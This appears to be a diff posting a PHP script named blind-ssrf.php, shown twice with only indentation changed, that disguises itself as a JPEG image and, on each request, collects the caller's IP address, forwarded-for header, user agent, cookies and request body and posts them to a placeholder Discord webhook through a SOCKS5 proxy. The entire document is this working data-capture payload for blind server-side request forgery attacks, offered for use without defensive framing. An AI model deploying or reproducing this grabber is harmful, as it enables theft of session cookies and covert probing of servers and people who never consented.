blackvoidx · December 14, 2024 08:11
diff --git a/blind-ssrf.php b/blind-ssrf.php
 <?php
 header("Content-Type: image/jpeg");

 $data = "GOT request :\n\n";
 $data .= "Requester: " . $_SERVER['REMOTE_ADDR'];
 $data .= "\nForwarded For: " . $_SERVER['HTTP_X_FORWARDED_FOR'];
 $data .= "\nUser Agent: " . $_SERVER['HTTP_USER_AGENT'];
 $data .= "\nCookie: " . json_encode($_COOKIE);
 $data .= "\nBody: " . json_encode($_REQUEST);

 $url = "DISCORD_WEBHOOK";  // Change this to the URL that the SSRF will attack

 $ch = curl_init($url);
 // Setup request to send json via POST.
 $payload = json_encode( array( "content"=> $data ) );
 curl_setopt( $ch, CURLOPT_POSTFIELDS, $payload );
 curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
 curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:12334"); // PROXY CONFIGURATION
 curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); // PROXY CONFIGURATION
 curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
 // Send request.
 $result = curl_exec($ch);
 curl_close($ch);
 ?>
	<?php
	header("Content-Type: image/jpeg");

	$data = "GOT request :\n\n";
	$data .= "Requester: " . $_SERVER['REMOTE_ADDR'];
	$data .= "\nForwarded For: " . $_SERVER['HTTP_X_FORWARDED_FOR'];
	$data .= "\nUser Agent: " . $_SERVER['HTTP_USER_AGENT'];
	$data .= "\nCookie: " . json_encode($_COOKIE);
	$data .= "\nBody: " . json_encode($_REQUEST);

	$url = "DISCORD_WEBHOOK"; // Change this to the URL that the SSRF will attack

	$ch = curl_init($url);
	// Setup request to send json via POST.
	$payload = json_encode( array( "content"=> $data ) );
	curl_setopt( $ch, CURLOPT_POSTFIELDS, $payload );
	curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
	curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:12334"); // PROXY CONFIGURATION
	curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); // PROXY CONFIGURATION
	curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
	// Send request.
	$result = curl_exec($ch);
	curl_close($ch);
	?>